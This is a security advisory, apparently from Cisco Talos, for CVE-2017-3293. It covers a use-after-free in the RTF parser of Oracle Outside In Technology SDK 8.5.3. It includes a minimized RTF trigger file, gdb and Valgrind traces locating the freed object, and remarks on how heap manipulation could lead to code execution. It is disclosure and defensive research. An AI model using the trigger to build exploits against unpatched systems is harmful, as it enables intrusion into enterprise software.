CVE-2017-3293
An exploitable Use After Free vulnerability exists in the RTF parser functionality of Oracle Outside In Technology SDK. A specially crafted RTF document can cause a reuse of a reference to the previously freed memory which can be manipulated into achieving arbitrary code execution.
Oracle Outside In Technology 8.5.3.
http://www.oracle.com/us/technologies/embedded/025613.htm
8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:C/A:C)
Oracle Outside In Technology SDK is a widely used file format access and filtering framework. It’s used in many enterprise software distributions for accessing, parsing, filtering and converting numerous file formats.
While parsing a specially crafted RTF document, a reference to a freed object is reused. If during the window of time after the object is freed and before its reference is reused, the same memory area is properly manipulated, it may result in arbitrary reading or writing of memory that could ultimately result in arbitrary code execution.
The minimized testcase that triggers this vulnerability is as follows:
{\rtf1
\ansi
{
\info
\par
}
{
\footer
\posx
{ \par }
}
{
\footer
}
}
In the above example testcase, \par
directive causes allocation of memory for an object which is subsequently freed. When document rendering reaches the second \footer
directive the same memory area is reused without new allocation. This results in accessing the freed memory. With proper memory manipulation, the attacker can cause the same area of memory to be allocated for a different object. With control of the allocated memory.
The memory allocation and object initialization is done in the function at 0xb6031310 in libde_wp.so
shared library (with image base 0xb6022000):
[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0xb5f52bac --> 0x10000
EDX: 0x4
ESI: 0xb5f52bac --> 0x10000
EDI: 0xad4c7f38 --> 0x1
EBP: 0xad499f58 --> 0x1
ESP: 0xbfffb1f0 --> 0x0
EIP: 0xb60352b6 (mov DWORD PTR [esp+0x28],eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xb60352aa: xor edx,edx
0xb60352ac: mov eax,0x4
0xb60352b1: call 0xb6031310
=> 0xb60352b6: mov DWORD PTR [esp+0x28],eax
0xb60352ba: mov edx,DWORD PTR [esp+0x28]
0xb60352be: test edx,edx
0xb60352c0: jne 0xb6034e40
0xb60352c6: jmp 0xb6034caa
[------------------------------------stack-------------------------------------]
0000| 0xbfffb1f0 --> 0x0
0004| 0xbfffb1f4 --> 0x0
0008| 0xbfffb1f8 --> 0xb603edae (<OIWCloseFatal>: push ebx)
0012| 0xbfffb1fc --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0016| 0xbfffb200 --> 0xb5f53d8c --> 0x0
0020| 0xbfffb204 --> 0x0
0024| 0xbfffb208 --> 0x0
0028| 0xbfffb20c --> 0xb5f52bac --> 0x10000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 16, 0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0 0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1 0xb603bb0f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2 0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3 0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4 0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5 0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#8 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#10 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#14 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#15 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#16 0x08048b7b in main ()
gdb-peda$
In the above output, we can see that allocated buffer is at 0xad496ac0. The buffer is later freed at 0xb602de67 in the same library by calling SYSNativeFree
which is a wrapper around free()
:
gdb-peda$ awatch *0xad496ac0
Hardware access (read/write) watchpoint 17: *0xad496ac0
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0xb6073934 --> 0x517f0
ECX: 0x7
EDX: 0x0
ESI: 0xad496ac0 (0xad496ac0)
EDI: 0xad496ac0 (0xad496ac0)
EBP: 0x1
ESP: 0xbfffa930 --> 0xb5f53e04 --> 0x0
EIP: 0xb602de5c (mov DWORD PTR [esp],esi)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xb602de52: je 0xb602de5a
0xb602de54: mov DWORD PTR [esi+0xc80],edx
0xb602de5a: mov esi,DWORD PTR [edi]
=> 0xb602de5c: mov DWORD PTR [esp],esi
0xb602de5f: call 0xb6027384 <SYSNativeUnlock@plt>
0xb602de64: mov DWORD PTR [esp],esi
0xb602de67: call 0xb6027424 <SYSNativeFree@plt>
0xb602de6c: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xbfffa930 --> 0xb5f53e04 --> 0x0
0004| 0xbfffa934 --> 0x1
0008| 0xbfffa938 --> 0x10001
0012| 0xbfffa93c --> 0xb6073934 --> 0x517f0
0016| 0xbfffa940 --> 0xb6073934 --> 0x517f0
0020| 0xbfffa944 --> 0xb601b9b0 --> 0xb601ba00 --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0024| 0xbfffa948 --> 0xb5f38ac0 (0xb5f38ac0)
0028| 0xbfffa94c --> 0xb602e243 (mov ecx,edi)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Hardware access (read/write) watchpoint 17: *0xad496ac0
Value = 0xad496ac0
0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0 0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1 0xb602e243 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2 0xb603336f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3 0xb6035dc0 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4 0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5 0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6 0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7 0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8 0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#9 0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#10 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#11 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#12 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#13 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#15 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#16 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#17 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#18 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#19 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#20 0x08048b7b in main ()
gdb-peda$
The first Use After Free condition occurs at 0xb6036062. During normal execution, the process will not crash because the memory still contains the same valid data, even though it is freed. If a debugging allocator is used (such as libduma), the freed page will be kept busy, but will be marked unreadable in order to catch this kind of issue. In that case, resuming the execution results in the following crash:
gdb-peda$ c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0x4c ('L')
EDX: 0xbfffb22c --> 0xb6073934 --> 0x517f0
ESI: 0xad385ac0 (0xad385ac0)
EDI: 0x0
EBP: 0xad34dac0 (0xad34dac0)
ESP: 0xbfffafd0 --> 0xbfffb058 --> 0x0
EIP: 0xb6036062 (cmp DWORD PTR [eax+0x40],0xffffffff)
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xb603604e: je 0xb60362ec
0xb6036054: cmp WORD PTR [esi+0x9dc],0x0
0xb603605c: js 0xb60362ec
=> 0xb6036062: cmp DWORD PTR [eax+0x40],0xffffffff
0xb6036066: je 0xb60362ec
0xb603606c: lea edx,[esi+0x30]
0xb603606f: mov DWORD PTR [esp+0x4c],edx
0xb6036073: add eax,0x40
[------------------------------------stack-------------------------------------]
0000| 0xbfffafd0 --> 0xbfffb058 --> 0x0
0004| 0xbfffafd4 --> 0x0
0008| 0xbfffafd8 --> 0x1d4
0012| 0xbfffafdc --> 0xb7c685b4 ("LOGetString")
0016| 0xbfffafe0 --> 0x1
0020| 0xbfffafe4 --> 0xb6020fa8 --> 0xb6076d51 --> 0xb6022000 --> 0x464c457f
0024| 0xbfffafe8 --> 0x16
0028| 0xbfffafec --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ vmmap $eax
Start End Perm Name
0xad46b000 0xad499000 ---p mapped
gdb-peda$ bt
#0 0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1 0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2 0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3 0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4 0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5 0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6 0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#10 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#15 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#16 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#17 0x08048b7b in main ()
gdb-peda$
In the above output, it should be observed that the pointer being dereferenced in the cmp
instruction is the same as previously freed, and the process has crashed because the page permissions deny read access.
By further manipulating the document by placing an object of precise size between the point of free and point of reuse, further memory corruption can be achieved potentially resulting in arbitrary code execution.
The vulnerability can be triggered by running the ixsample
binary, included in the SDK, with the above mentioned testcase. Although the supplied testcase doesn’t cause a crash, the use after free can be caught with Valgrind for example.
Example output from Valgrind:
$ valgrind $IX ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551== Memcheck, a memory error detector
==17551== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==17551== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info
==17551== Command: /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/ixsample ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551==
Creating file: "asd"
==17551== Invalid read of size 4
==17551== at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5912ABD: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551== at 0x5905DB7: WPUCompSccvwPos (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551== at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5912A63: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 1
==17551== at 0x59174BE: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A3521: VwImageExportWriteFunc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x509C851: VwExportWriteFuncEx (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== Address 0x5d394b0 is 5,408 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
Export successful: 1 output file(s) created.
==17551==
==17551== HEAP SUMMARY:
==17551== in use at exit: 28 bytes in 2 blocks
==17551== total heap usage: 19,458 allocs, 19,456 frees, 25,394,878 bytes allocated
==17551==
==17551== LEAK SUMMARY:
==17551== definitely lost: 0 bytes in 0 blocks
==17551== indirectly lost: 0 bytes in 0 blocks
==17551== possibly lost: 0 bytes in 0 blocks
==17551== still reachable: 28 bytes in 2 blocks
==17551== suppressed: 0 bytes in 0 blocks
==17551== Rerun with --leak-check=full to see details of leaked memory
==17551==
==17551== For counts of detected and suppressed errors, rerun with: -v
==17551== ERROR SUMMARY: 12 errors from 4 contexts (suppressed: 0 from 0)
2016-10-10 - Vendor Disclosure
2017-01-17 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.